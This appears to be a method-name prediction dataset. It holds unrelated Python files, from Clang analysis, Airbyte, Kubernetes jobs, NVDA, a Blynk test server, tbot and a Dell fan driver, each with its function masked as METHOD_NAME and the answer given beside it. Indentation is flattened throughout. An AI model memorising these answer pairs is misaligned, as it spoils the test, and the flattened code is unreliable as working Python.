"""
Clang Static Analyzer related functions.
"""
import os
import subprocess
from codechecker_common.logger import get_logger
from codechecker_analyzer import host_check
from codechecker_analyzer.analyzers.clangsa import version
LOG = get_logger('analyzer.clangsa')
CTU_ON_DEMAND_OPTION_NAME = 'ctu-invocation-list'
def METHOD_NAME(clang_version_info):
"""Clang version dependent ctu mapping tool path and mapping file name.
The path of the mapping tool, which is assumed to be located
inside the installed directory of the analyzer. Certain binary
distributions can postfix the tool name with the major version
number, the number and the tool name being separated by a dash. By
default the shorter name is looked up, then if it is not found the
postfixed.
"""
if not clang_version_info:
LOG.debug("No clang version information."
"Can not detect ctu mapping tool.")
return None, None
old_mapping_tool_name = 'clang-func-mapping'
old_mapping_file_name = 'externalFnMap.txt'
new_mapping_tool_name = 'clang-extdef-mapping'
new_mapping_file_name = 'externalDefMap.txt'
major_version = clang_version_info.major_version
if major_version > 7:
tool_name = new_mapping_tool_name
mapping_file = new_mapping_file_name
else:
tool_name = old_mapping_tool_name
mapping_file = old_mapping_file_name
installed_dir = clang_version_info.installed_dir
tool_path = os.path.join(installed_dir, tool_name)
if os.path.isfile(tool_path):
return tool_path, mapping_file
LOG.debug(
"Mapping tool '%s' suggested by autodetection is not found in "
"directory reported by Clang '%s'. Trying with version-postfixed "
"filename...", tool_path, installed_dir)
postfixed_tool_path = ''.join([tool_path, '-', str(major_version)])
if os.path.isfile(postfixed_tool_path):
return postfixed_tool_path, mapping_file
LOG.debug(
"Postfixed mapping tool '%s' suggested by autodetection is not "
"found in directory reported by Clang '%s'.",
postfixed_tool_path, installed_dir)
return None, None
def invoke_binary_checked(binary_path, args=None, environ=None):
"""
Invoke the binary with the specified args, and return the output if the
command finished running with zero exit code. Return False otherwise.
Possible usage can be used to check the existence binaries.
:param binary_path: The path to the executable to invoke
:param args: The arguments of the invocation
:type binary_path: str
:type args: list
:rtype str
"""
args = args or []
invocation = [binary_path]
invocation.extend(args)
try:
output = subprocess.check_output(
invocation,
env=environ,
encoding="utf-8",
errors="ignore")
except (subprocess.CalledProcessError, OSError) as e:
LOG.debug('Command invocation failed because of non-zero exit code!'
'Details: %s', str(e))
return False
return output
class CTUAutodetection:
"""
CTUAutodetection is responsible for providing the availability information
of CTU feature, the the relevant mapping tool path and the mapping file
name.
"""
def __init__(self, analyzer_binary, environ):
self.__analyzer_binary = analyzer_binary
self.environ = environ
self.__analyzer_version_info = None
if self.__analyzer_binary is None:
LOG.debug(
'Trying to detect CTU capability, but analyzer binary is not '
'set!')
return None
analyzer_version = invoke_binary_checked(
self.__analyzer_binary, ['--version'], self.environ)
if analyzer_version is False:
LOG.debug('Failed to invoke command to get Clang version!')
return None
version_parser = version.ClangVersionInfoParser(self.__analyzer_binary)
version_info = version_parser.parse(analyzer_version)
if not version_info:
LOG.debug('Failed to parse Clang version information!')
return None
self.__analyzer_version_info = version_info
@property
def analyzer_version_info(self):
"""
Returns the relevant parameters of the analyzer by parsing the
output of the analyzer binary when called with version flag.
"""
if not self.__analyzer_version_info:
return False
return self.__analyzer_version_info
@property
def major_version(self):
"""
Returns the major version of the analyzer, which is used for
CTU analysis.
"""
return self.analyzer_version_info.major_version
@property
def installed_dir(self):
"""
Returns the installed directory of the analyzer, which is used for
CTU analysis.
"""
return self.analyzer_version_info.installed_dir
@property
def mapping_tool_path(self):
"""Return the path to the mapping tool."""
tool_path, _ = METHOD_NAME(self.analyzer_version_info)
if tool_path:
return tool_path
return False
@property
def display_progress(self):
"""
Return analyzer args if it is capable to display ctu progress.
Returns None if the analyzer can not display ctu progress.
The ctu display progress arguments depend on
the clang analyzer version.
"""
if not self.analyzer_version_info:
return None
ctu_display_progress_args = ['-Xclang',
'-analyzer-config',
'-Xclang',
'display-ctu-progress=true']
ok = host_check.has_analyzer_config_option(
self.__analyzer_binary, "display-ctu-progress")
if not ok:
return None
return ctu_display_progress_args
@property
def mapping_file_name(self):
"""
Returns the installed directory of the analyzer, which is used for
CTU analysis.
"""
_, mapping_file_name = METHOD_NAME(self.analyzer_version_info)
if mapping_file_name:
return mapping_file_name
return False
@property
def is_ctu_capable(self):
"""
Detects if the current clang is CTU compatible. Tries to autodetect
the correct one based on clang version.
"""
tool_path = self.mapping_tool_path
if not tool_path:
return False
return invoke_binary_checked(tool_path, ['-version'], self.environ) \
is not False
@property
def is_on_demand_ctu_available(self):
"""
Detects if the current Clang supports on-demand parsing of ASTs for
CTU analysis.
"""
analyzer_options = invoke_binary_checked(
self.__analyzer_binary, ['-cc1', '-analyzer-config-help'],
self.environ)
if analyzer_options is False:
return False
return CTU_ON_DEMAND_OPTION_NAME in analyzer_options | null |
read profiles yml | #
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import argparse
import os
from typing import Any, Dict
import yaml
from normalization.destination_type import DestinationType
from normalization.transform_catalog.catalog_processor import CatalogProcessor
class TransformCatalog:
"""
To run this transformation:
```
python3 main_dev_transform_catalog.py \
--integration-type <postgres|bigquery|redshift|snowflake>
--profile-config-dir . \
--catalog integration_tests/catalog.json \
--out dir \
--json-column json_blob
```
"""
config: dict = {}
DBT_PROJECT = "dbt_project.yml"
def __init__(self):
self.config = {}
def run(self, args) -> None:
self.parse(args)
self.process_catalog()
def parse(self, args) -> None:
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("--integration-type", type=str, required=True, help="type of integration dialect to use")
parser.add_argument("--profile-config-dir", type=str, required=True, help="path to directory containing DBT profiles.yml")
parser.add_argument("--catalog", nargs="+", type=str, required=True, help="path to Catalog (JSON Schema) file")
parser.add_argument("--out", type=str, required=True, help="path to output generated DBT Models to")
parser.add_argument("--json-column", type=str, required=False, help="name of the column containing the json blob")
parsed_args = parser.parse_args(args)
profiles_yml = METHOD_NAME(parsed_args.profile_config_dir)
self.config = {
"integration_type": parsed_args.integration_type,
"schema": extract_schema(profiles_yml),
"catalog": parsed_args.catalog,
"output_path": parsed_args.out,
"json_column": parsed_args.json_column,
"profile_config_dir": parsed_args.profile_config_dir,
}
def process_catalog(self) -> None:
destination_type = DestinationType.from_string(self.config["integration_type"])
schema = self.config["schema"]
output = self.config["output_path"]
json_col = self.config["json_column"]
processor = CatalogProcessor(output_directory=output, destination_type=destination_type)
for catalog_file in self.config["catalog"]:
print(f"Processing {catalog_file}...")
processor.process(catalog_file=catalog_file, json_column_name=json_col, default_schema=schema)
self.update_dbt_project_vars(json_column=self.config["json_column"], models_to_source=processor.models_to_source)
def update_dbt_project_vars(self, **vars_config: Dict[str, Any]):
filename = os.path.join(self.config["profile_config_dir"], self.DBT_PROJECT)
config = read_yaml_config(filename)
config["vars"] = {**config.get("vars", {}), **vars_config}
write_yaml_config(config, filename)
def METHOD_NAME(profile_dir: str) -> Any:
with open(os.path.join(profile_dir, "profiles.yml"), "r") as file:
config = yaml.load(file, Loader=yaml.FullLoader)
obj = config["normalize"]["outputs"]["prod"]
return obj
def read_yaml_config(filename: str) -> Dict[str, Any]:
with open(filename, "r") as fp:
config = yaml.safe_load(fp)
if not isinstance(config, dict):
raise RuntimeError("{} does not parse to a dictionary".format(os.path.basename(filename)))
return config
def write_yaml_config(config: Dict[str, Any], filename: str):
with open(filename, "w") as fp:
fp.write(yaml.dump(config, sort_keys=False))
def extract_schema(profiles_yml: Dict) -> str:
if "dataset" in profiles_yml:
return str(profiles_yml["dataset"])
elif "schema" in profiles_yml:
return str(profiles_yml["schema"])
else:
raise KeyError("No Dataset/Schema defined in profiles.yml")
def extract_path(profiles_yml: Dict) -> str:
if "path" in profiles_yml:
return str(profiles_yml["path"])
else:
raise KeyError("No destination_path defined in profiles.yml")
def main(args=None):
TransformCatalog().run(args) | null |
from db row | from datetime import datetime
from typing import Dict, List, Optional, Union
from hikaru.model.rel_1_26 import Job
from kubernetes.client import V1Container, V1Job, V1JobSpec, V1JobStatus, V1PodSpec
from pydantic import BaseModel
from robusta.core.discovery import utils
from robusta.core.model.pods import ContainerResources, ResourceAttributes
SERVICE_TYPE_JOB = "Job"
class JobContainer(BaseModel):
image: str
cpu_req: float
cpu_limit: float
mem_req: int
mem_limit: int
@staticmethod
def from_api_server(container: V1Container) -> "JobContainer":
requests: ContainerResources = utils.container_resources(container, ResourceAttributes.requests)
limits: ContainerResources = utils.container_resources(container, ResourceAttributes.limits)
return JobContainer(
image=container.image,
cpu_req=requests.cpu,
cpu_limit=limits.cpu,
mem_req=requests.memory,
mem_limit=limits.memory,
)
class JobCondition(BaseModel):
type: str
message: Optional[str]
class JobStatus(BaseModel):
active: int = 0
failed: int = 0
succeeded: int = 0
completion_time: Optional[str]
failed_time: Optional[str]
conditions: List[JobCondition]
@staticmethod
def from_api_server(job: Union[V1Job, Job]) -> "JobStatus":
job_status: V1JobStatus = job.status
job_conditions: List[JobCondition] = [
JobCondition(type=condition.type, message=condition.message)
for condition in (job_status.conditions or [])
if condition.status.lower() == "true"
]
completion_time = getattr(job_status, "completion_time", None) or getattr(job_status, "completionTime", None)
return JobStatus(
active=job_status.active or 0,
failed=job_status.failed or 0,
succeeded=job_status.succeeded or 0,
completion_time=str(completion_time),
conditions=job_conditions,
failed_time=str(JobStatus._extract_failed_time(job_status)),
)
@staticmethod
def _extract_failed_time(job_status: V1JobStatus) -> Optional[datetime]:
try:
for condition in job_status.conditions:
if condition.status.lower() == "true" and condition.type == "Failed":
return getattr(condition, "last_transition_time", None) or getattr(
condition, "lastTransitionTime", None
)
except (
AttributeError,
TypeError,
): # if a field is missing
return None
class JobData(BaseModel):
backoff_limit: int
tolerations: Optional[List[Dict]]
node_selector: Optional[Dict]
labels: Optional[Dict[str, str]]
containers: List[JobContainer]
pods: Optional[List[str]]
parents: Optional[List[str]]
@staticmethod
def _get_job_parents(job: Union[V1Job, Job]) -> List[str]:
try:
owner_references = getattr(job.metadata, "owner_references", []) or getattr(
job.metadata, "ownerReferences", []
)
return [owner_ref.name for owner_ref in owner_references]
except Exception:
return []
@staticmethod
def from_api_server(job: Union[V1Job, Job], pods: List[str]) -> "JobData":
job_spec: V1JobSpec = job.spec
pod_spec: V1PodSpec = job_spec.template.spec
pod_containers: List[JobContainer] = [
JobContainer.from_api_server(container) for container in pod_spec.containers
]
backoff_lim = job_spec.backoff_limit if hasattr(job_spec, "backoff_limit") else job_spec.backoffLimit
return JobData(
backoff_limit=backoff_lim,
tolerations=[toleration.to_dict() for toleration in (pod_spec.tolerations or [])],
node_selector=getattr(pod_spec, "node_selector", {}) or getattr(pod_spec, "nodeSelector", {}),
labels=job.metadata.labels,
containers=pod_containers,
pods=pods,
parents=JobData._get_job_parents(job),
)
class JobInfo(BaseModel):
name: str
namespace: str
type: str = SERVICE_TYPE_JOB
created_at: str
deleted: bool = False
cpu_req: float
mem_req: int
completions: int
status: JobStatus
job_data: JobData
def get_service_key(self) -> str:
return f"{self.namespace}/{self.type}/{self.name}"
def __eq__(self, other):
if not isinstance(other, JobInfo):
return NotImplemented
return ( # ignore created_at because of dates format
self.name == other.name
and self.namespace == other.namespace
and self.deleted == other.deleted
and self.cpu_req == other.cpu_req
and self.mem_req == other.mem_req
and self.completions == other.completions
and self.status == other.status
and self.job_data == other.job_data
)
@staticmethod
def METHOD_NAME(job: dict) -> "JobInfo":
return JobInfo(
name=job["name"],
namespace=job["namespace"],
created_at=job["created_at"],
deleted=job["deleted"],
cpu_req=job["cpu_req"],
mem_req=job["mem_req"],
completions=job["completions"],
status=JobStatus(**job["status"]),
job_data=JobData(**job["job_data"]),
)
@staticmethod
def from_api_server(job: Union[V1Job, Job], pods: List[str]) -> "JobInfo":
containers = job.spec.template.spec.containers
requests: ContainerResources = utils.containers_resources_sum(containers, ResourceAttributes.requests)
status = JobStatus.from_api_server(job)
job_data = JobData.from_api_server(job, pods)
completions = job.spec.completions if job.spec.completions is not None else 1
creation_ts = getattr(job.metadata, "creation_timestamp", None) or getattr(
job.metadata, "creationTimestamp", None
)
return JobInfo(
name=job.metadata.name,
namespace=job.metadata.namespace,
created_at=str(creation_ts),
cpu_req=requests.cpu,
mem_req=requests.memory,
completions=completions,
status=status,
job_data=job_data,
) | null |
is hankaku katakana | # coding: UTF-8
# _checkCharDesc.py
# A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2012,2023 Takuya Nishimoto, NVDA Japanese Team
import re, codecs
from getord import getOrd
LOCALE_JA = r"..\source\locale\ja"
SY_FILE = LOCALE_JA + r"\symbols.dic"
CH_FILE = LOCALE_JA + r"\characterDescriptions.dic"
CS_FILE = LOCALE_JA + r"\characters.dic"
def read_symbol_file(sy_file, returnSource=False, raiseDuplicated=True):
src = []
with codecs.open(sy_file, encoding="utf-8") as sy:
mode = None
ar = {}
c = 0
for line in sy:
c += 1
line = line.rstrip()
if line == "complexSymbols:":
mode = 1
src.append(line)
continue
if line == "symbols:":
mode = 2
src.append(line)
continue
if len(line) == 0:
src.append(line)
continue
if line[0] == "#":
src.append(line)
continue
if mode == 2:
a = line.split("\t")
if len(a) >= 2 and (len(a[0]) == 1 or a[0][0] == "\\"):
if ar.has_key(a[0]):
print(
"duplicated %04x %s (line %d and %d)"
% (ord(a[0]), a[0], ar[a[0]][0], c)
)
if raiseDuplicated:
raise Exception
key = a[0]
if key[0] == "\\":
key = key.decode("string_escape")[0]
s = "U+%04x" % ord(key)
ar[key] = [c, a[1].strip()]
# add comment field
if a[-1][0] == "#":
# delete existing 'U+xxxx' string
a[-1] = re.sub(r" U\+[0-9a-f]{4}", "", a[-1])
a[-1] += " " + s
else:
a.append("# %s %s" % (key, s))
line = "\t".join(a)
src.append(line)
if returnSource:
return ar, src
return ar
def read_chardesc_file(ch_file):
with codecs.open(ch_file, encoding="utf-8") as ch:
ar = {}
c = 0
for line in ch:
c += 1
line = line.rstrip()
if len(line) == 0:
continue
if line[0] == "#":
continue
if line[0:2] == "\\#":
line = "#" + line[2:]
a = line.split("\t")
if len(a) >= 2:
ar[a[0]] = [c, a[1]]
return ar
def read_characters_file(cs_file, use_both=False):
count = 0
with codecs.open(cs_file, encoding="utf-8") as ch:
ar = {}
c = 0
for line in ch:
c += 1
line = line.rstrip()
if len(line) == 0:
continue
if line[0] == "#":
continue
if line[0:2] == "\\#":
line = "#" + line[2:]
a = line.split("\t")
if len(a) >= 4:
if use_both:
ar[a[0]] = [
c,
a[2].replace("[", "").replace("]", "") + " * " + a[3],
]
else:
ar[a[0]] = [c, a[3]]
count += 1
return ar
def print_diff(sy, ch):
for k, v in ch.items():
if k in sy:
if v[1] == sy[k][1]:
continue
print("ch %d %s %s / sy %d %s" % (v[0], k, v[1], sy[k][0], sy[k][1]))
C = re.compile("\s+")
def equals_ignore_spaces(s1, s2):
s1 = C.sub("", s1)
s2 = C.sub("", s2)
if s1 == s2:
return True
return False
def print_different(sy, ch, skip_included=False, report_included=False):
ar = {}
for k, v in ch.items():
if k in sy:
s1 = v[1]
s2 = sy[k][1]
if equals_ignore_spaces(s1, s2):
continue
if skip_included:
# 片方がもう一方に含まれる場合はスキップ
if (s1 in s2) or (s2 in s1):
if report_included:
print("included %04x ch %s / sy %s" % (ord(k), s1, s2))
continue
# 'セン' を取り除いて、片方がもう一方に含まれる場合はスキップ
s1_ = s1.replace("セン", "")
s2_ = s2.replace("セン", "")
if (s1_ in s2_) or (s2_ in s1_):
if report_included:
print("included %04x ch %s / sy %s" % (ord(k), s1, s2))
continue
# 'ノ ナカニ' を取り除いて、片方がもう一方に含まれる場合はスキップ
s1_ = s1.replace("ノ ナカニ", "")
s2_ = s2.replace("ノ ナカニ", "")
if (s1_ in s2_) or (s2_ in s1_):
if report_included:
print("included %04x ch %s / sy %s" % (ord(k), s1, s2))
continue
# 'スーガク' を取り除いて、片方がもう一方に含まれる場合はスキップ
s1_ = s1.replace(" ", "")
s2_ = s2.replace(" ", "")
if (s1_ in s2_) or (s2_ in s1_):
if report_included:
print("included %04x ch %s / sy %s" % (ord(k), s1, s2))
continue
output = "%04x sy %d %s / ch %d %s %s" % (
ord(k),
sy[k][0],
sy[k][1],
v[0],
k,
v[1],
)
ar[sy[k][0]] = output
for s in sorted(ar.items(), key=lambda x: int(x[0])):
print(s[1])
def find_desc_duplicate(ch, skipKeisen=True, skipEmoji=True):
for k, v in ch.items():
for k2, v2 in ch.items():
if skipKeisen and ("ケイセン" in v[1] or "ケイセン" in v2[1]):
continue
if skipEmoji and ("エモジ" in v[1] or "エモジ" in v2[1]):
continue
assert isinstance(v[0], int) or isinstance(v[0], str)
assert isinstance(v2[0], int) or isinstance(v2[0], str)
if (
type(v[0]) == type(v2[0]) == int
and v[0] < v2[0]
and k != k2
and equals_ignore_spaces(v[1], v2[1])
):
print(
"ch %d:%s %04x / %d:%s %04x / %s"
% (v[0], k, getOrd(k), v2[0], k2, getOrd(k2), v2[1])
)
def isZenkakuKatakana(c):
return re.search(r"[ァ-ヾ]", c) is not None
def METHOD_NAME(c):
return re.search(r"[ヲ-ン]", c) is not None
def isHalfShape(c):
c = c[0:1]
return (32 < ord(c)) and (ord(c) < 128)
def add_katakana_prefix_to_characters(ch):
ar = {}
for k, v in ch.items():
if isZenkakuKatakana(k):
v = "カタカナ " + str(v)
elif METHOD_NAME(k):
v = "ハンカクカタカナ " + str(v)
elif k.isupper():
v = "オオモジ " + str(v)
elif isHalfShape(k):
v = "ハンカク " + str(v)
ar[k] = v
return ar | null |
writethread | #!/usr/bin/python
'''
This is a pseudo-server that sends predefined pattern to any connected client.
It is used to test transport behaviour and throughput.
If you want to use it with a sketch, connect your PC and Blynk-enabled device
into the same network and configure Blynk to connect to this pseudo-server:
IPAddress serv(192,168,0,105); // IP address of your PC
Blynk.begin(auth, serv, 8888);
Author: Volodymyr Shymanskyy
License: The MIT license
'''
import select, socket, struct
import os, sys, time, getopt
from threading import Thread
# Configuration options
# Parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:],
"hb:p:",
["help", "bind=", "port=", "sndbuf=", "rcvbuf=", "nodelay", "sleep=", "qty=", "freq=", "pin=", "dump"])
except getopt.GetoptError:
print >>sys.stderr, __doc__
sys.exit(2)
# Default options
HOST = '' # Bind to all interfaces
PORT = 8888 # Bind to port 8888
NODELAY = 0 # No TCP_NODELAY
SNDBUF = 0 # No SNDBUF override
RCVBUF = 0 # No RCVBUF override
MSG_QTY = 10 # Amount of messages
SLEEP = 1.0 # Wait some time between IO
HW_PIN = "A0" # Pin #
DUMP = 0
for o, v in opts:
if o in ("-h", "--help"):
print __doc__
sys.exit()
elif o in ("-b", "--bind"):
HOST = v
elif o in ("-p", "--port"):
PORT = int(v)
elif o in ("--sndbuf",):
SNDBUF = int(v)
elif o in ("--rcvbuf",):
RCVBUF = int(v)
elif o in ("--nodelay",):
NODELAY = 1
elif o in ("--sleep",):
SLEEP = float(v)
elif o in ("--freq",):
SLEEP = 1.0/float(v)
elif o in ("--qty",):
MSG_QTY = int(v)
elif o in ("--pin",):
HW_PIN = int(v)
elif o in ("--dump",):
DUMP = 1
# Blynk protocol helpers
hdr = struct.Struct("!BHH")
class MsgType:
RSP = 0
LOGIN = 2
PING = 6
HW = 20
class MsgStatus:
OK = 200
def hw(*args):
# Convert params to string and join using \0
data = "\0".join(map(str, args))
dump("< " + " ".join(map(str, args)))
# Prepend HW command header
return hdr.pack(MsgType.HW, 1, len(data)) + data
# Print utilities
start_time = time.time()
def log(msg):
print "[{:7.3f}] {:}".format(float(time.time() - start_time), msg)
draw_col = 0
def draw(c):
global draw_col
if not DUMP:
sys.stdout.write(c)
draw_col = (draw_col + 1) % 120
if draw_col:
sys.stdout.flush()
else:
sys.stdout.write("\n")
def dump(msg):
if DUMP:
log(msg)
def receive(sock, length):
d = []
l = 0
while l < length:
r = sock.recv(length-l)
if not r:
return ''
d.append(r)
l += len(r)
return ''.join(d)
# Threads
def readthread(conn, addr):
global msgs_in, authenticated
while(msgs_in < MSG_QTY):
data = receive(conn, hdr.size)
if not data:
break
msg_type, msg_id, msg_len = hdr.unpack(data)
#dump("Got {0}, {1}, {2}".format(msg_type, msg_id, msg_len))
if msg_type == MsgType.RSP:
pass
elif msg_type == MsgType.LOGIN:
auth = receive(conn, msg_len)
log("Auth {0}".format(auth))
# Send auth OK and pin modes
conn.sendall(hdr.pack(MsgType.RSP, msg_id, MsgStatus.OK))
conn.sendall(hw("pm", HW_PIN, "in"))
authenticated = True
elif msg_type == MsgType.PING:
log("Ping")
# Send Pong
conn.sendall(hdr.pack(MsgType.RSP, msg_id, MsgStatus.OK))
elif msg_type == MsgType.HW:
data = receive(conn, msg_len)
# Print HW messages (just for fun :)
draw('v')
dump("> " + " ".join(data.split("\0")))
msgs_in += 1
else:
log("Unknown msg type")
break
def METHOD_NAME(conn, addr):
global msgs_out, authenticated
while (msgs_out < MSG_QTY):
if authenticated:
conn.sendall(hw("ar", HW_PIN))
draw('.')
msgs_out += 1
time.sleep(SLEEP)
# Main code
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Set SO_REUSEADDR, this is needed to ignore WAIT state on next run
serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serv.bind((HOST, PORT))
except socket.error as msg:
log('Bind failed. Error Code: {0}, Msg: {1}'.format(str(msg[0]), msg[1]))
sys.exit()
serv.listen(1)
log('Listening on port %d' % PORT)
# Wait for clients
#while True:
conn, addr = serv.accept()
log('Connection from {0}:{1}'.format(addr[0], str(addr[1])))
if NODELAY != 0:
conn.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if SNDBUF != 0:
sndbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)
log('Default SNDBUF %s changed to %s' % (sndbuf, SNDBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SNDBUF)
if RCVBUF != 0:
rcvbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
log('Default RCVBUF %s changed to %s' % (rcvbuf, RCVBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, RCVBUF)
proc_start = time.time()
msgs_in = 0
msgs_out = 0
authenticated = False
wt = Thread(target=readthread, args=(conn, addr))
rt = Thread(target=METHOD_NAME, args=(conn, addr))
wt.start()
rt.start()
wt.join()
rt.join()
draw("\n")
log("Time %3.4f" % (time.time() - proc_start))
log("Sent {0} messages".format(msgs_out))
log("Recv {0} messages".format(msgs_in))
conn.close() | null |
selftest path files | # tbot, Embedded Automation Tool
# Copyright (C) 2019 Harald Seiler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import typing
import stat
import tbot
import tbot.error
from tbot.machine import linux
from tbot.tc import selftest
__all__ = ["selftest_path_integrity", "selftest_path_stat", "selftest_path_files"]
@tbot.testcase
def selftest_path_integrity(lab: typing.Optional[selftest.SelftestHost] = None) -> None:
"""Test if using a path on the wrong host fails."""
with lab or selftest.SelftestHost() as lh:
p = lh.workdir / "folder" / "file.txt"
with tbot.acquire_lab() as lh2:
raised = False
try:
# mypy detects that this is wrong
lh2.exec0("echo", p) # type: ignore
except tbot.error.WrongHostError:
raised = True
assert raised
# It is ok to clone a machine and reuse the path
with lh.clone() as lh3:
lh3.exec0("echo", p)
lh.exec0("mkdir", "-p", p.parent)
assert p.parent.is_dir()
lh.exec0("uname", "-a", linux.RedirStdout(p))
assert p.is_file()
lh.exec0("rm", "-r", p.parent)
assert not p.exists()
assert not p.parent.exists()
@tbot.testcase
def selftest_path_stat(lab: typing.Optional[selftest.SelftestHost] = None) -> None:
"""Test path stat utilities."""
with lab or selftest.SelftestHost() as lh:
tbot.log.message("Setting up test files ...")
symlink = lh.workdir / "symlink"
if symlink.exists():
lh.exec0("rm", symlink)
lh.exec0("ln", "-s", "/proc/version", symlink)
fifo = lh.workdir / "fifo"
if fifo.exists():
lh.exec0("rm", fifo)
lh.exec0("mkfifo", fifo)
nonexistent = lh.workdir / "nonexistent"
if nonexistent.exists():
lh.exec0("rm", nonexistent)
# Block device
block_list = (
lh.exec0(
*["find", "/dev", "-type", "b"],
linux.Raw("2>/dev/null"),
linux.OrElse,
"true",
)
.strip()
.split("\n")
)
block_dev = None
if block_list != []:
block_dev = linux.Path(lh, "/dev") / block_list[0]
# Existence checks
tbot.log.message("Checking existence ...")
assert not (lh.workdir / "nonexistent").exists()
assert symlink.exists()
# File mode checks
tbot.log.message("Checking file modes ...")
assert linux.Path(lh, "/dev").is_dir()
assert linux.Path(lh, "/proc/version").is_file()
assert symlink.is_symlink()
if block_dev is not None:
assert linux.Path(lh, block_dev).is_block_device()
assert linux.Path(lh, "/dev/tty").is_char_device()
assert fifo.is_fifo()
# File mode nonexistence checks
tbot.log.message("Checking file modes on nonexistent files ...")
assert not nonexistent.is_dir()
assert not nonexistent.is_file()
assert not nonexistent.is_symlink()
assert not nonexistent.is_block_device()
assert not nonexistent.is_char_device()
assert not nonexistent.is_fifo()
assert not nonexistent.is_socket()
stat_list = [
(linux.Path(lh, "/dev"), stat.S_ISDIR),
(linux.Path(lh, "/proc/version"), stat.S_ISREG),
(symlink, stat.S_ISLNK),
(linux.Path(lh, "/dev/tty"), stat.S_ISCHR),
(fifo, stat.S_ISFIFO),
]
if block_dev is not None:
stat_list.insert(3, (linux.Path(lh, block_dev), stat.S_ISBLK))
tbot.log.message("Checking stat results ...")
for p, check in stat_list:
assert check(p.stat().st_mode)
@tbot.testcase
def METHOD_NAME(lab: typing.Optional[selftest.SelftestHost] = None) -> None:
"""Test accessing file via the Path class"""
with lab or selftest.SelftestHost() as lh:
f = lh.workdir / "test-file.dat"
tbot.log.message("Testing text file access ...")
content = "This is a test file\nwith multiple lines.\n"
f.write_text(content)
output = f.read_text()
assert output == content, f"Sending {content!r} resulted in {output!r}"
tbot.log.message("Testing binary file access ...")
content_bin = b"\x00\x1b[m\x04\x01\x10"
assert f.write_bytes(content_bin) == len(content_bin), "Length mismatch"
output_bin = f.read_bytes()
assert (
output_bin == content_bin
), f"Sending {content_bin!r} resulted in {output_bin!r}"
tbot.log.message("Test reading/writing invalid file ...")
f = lh.workdir / "path-test.50278c53-3cfc-4983-9770-d571b29b3955"
# Writing/reading a directory should always fail
lh.exec0("mkdir", "-p", f)
raised = False
try:
f.write_text("Hello World\n")
except Exception:
raised = True
assert raised, "Writing invalid file supposedly succeeded (text mode)"
raised = False
try:
f.read_text()
except Exception:
raised = True
assert raised, "Reading invalid file supposedly succeeded (text mode)"
raised = False
try:
f.write_bytes(b"Hello World\n")
except Exception:
raised = True
assert raised, "Writing invalid file supposedly succeeded (binary mode)"
raised = False
try:
f.read_bytes()
except Exception:
raised = True
assert raised, "Reading invalid file supposedly succeeded (binary mode)" | null |
get presence | #!/usr/bin/env python
########################################################################
# DellEMC S5232F
#
# Module contains an implementation of SONiC Platform Base API and
# provides the Fans' information which are available in the platform.
#
########################################################################
try:
from sonic_platform_base.fan_base import FanBase
from sonic_platform.ipmihelper import IpmiSensor, IpmiFru
except ImportError as e:
raise ImportError(str(e) + "- required module not found")
FAN1_MAX_SPEED_OFFSET = 71
FAN2_MAX_SPEED_OFFSET = 73
PSU_FAN_MAX_SPEED_OFFSET = 50
FAN_DIRECTION_OFFSET = 69
PSU_FAN_DIRECTION_OFFSET = 47
class Fan(FanBase):
"""DellEMC Platform-specific Fan class"""
# { FAN-ID: { Sensor-Name: Sensor-ID } }
FAN_SENSOR_MAPPING = { 1: {"Prsnt": 0x53, "State": 0x57, "Speed": 0x24},
2: {"Prsnt": 0x53, "State": 0x5b, "Speed": 0x20},
3: {"Prsnt": 0x54, "State": 0x58, "Speed": 0x25},
4: {"Prsnt": 0x54, "State": 0x5c, "Speed": 0x21},
5: {"Prsnt": 0x55, "State": 0x59, "Speed": 0x26},
6: {"Prsnt": 0x55, "State": 0x5d, "Speed": 0x22},
7: {"Prsnt": 0x56, "State": 0x5a, "Speed": 0x27},
8: {"Prsnt": 0x56, "State": 0x5e, "Speed": 0x23} }
PSU_FAN_SENSOR_MAPPING = { 1: {"State": 0x31, "Speed": 0x28},
2: {"State": 0x32, "Speed": 0x29} }
# { FANTRAY-ID: FRU-ID }
FAN_FRU_MAPPING = { 1: 3, 2: 4, 3: 5, 4: 6 }
PSU_FRU_MAPPING = { 1: 1, 2: 2 }
def __init__(self, fantray_index=1, fan_index=1, psu_fan=False,
dependency=None):
FanBase.__init__(self)
self.is_psu_fan = psu_fan
if not self.is_psu_fan:
# API index is starting from 0, DellEMC platform index is
# starting from 1
self.fantrayindex = fantray_index + 1
self.fanindex = fan_index + 1
if (self.fanindex == 1):
self.max_speed_offset = FAN1_MAX_SPEED_OFFSET
else:
self.max_speed_offset = FAN2_MAX_SPEED_OFFSET
self.fan_direction_offset = FAN_DIRECTION_OFFSET
self.index = (self.fantrayindex - 1) * 2 + self.fanindex
self.prsnt_sensor = IpmiSensor(self.FAN_SENSOR_MAPPING[self.index]["Prsnt"],
is_discrete=True)
self.state_sensor = IpmiSensor(self.FAN_SENSOR_MAPPING[self.index]["State"],
is_discrete=True)
self.speed_sensor = IpmiSensor(self.FAN_SENSOR_MAPPING[self.index]["Speed"])
self.fru = IpmiFru(self.FAN_FRU_MAPPING[self.fantrayindex])
else:
self.dependency = dependency
self.fanindex = fan_index
self.state_sensor = IpmiSensor(self.PSU_FAN_SENSOR_MAPPING[self.fanindex]["State"],
is_discrete=True)
self.speed_sensor = IpmiSensor(self.PSU_FAN_SENSOR_MAPPING[self.fanindex]["Speed"])
self.fru = IpmiFru(self.PSU_FRU_MAPPING[self.fanindex])
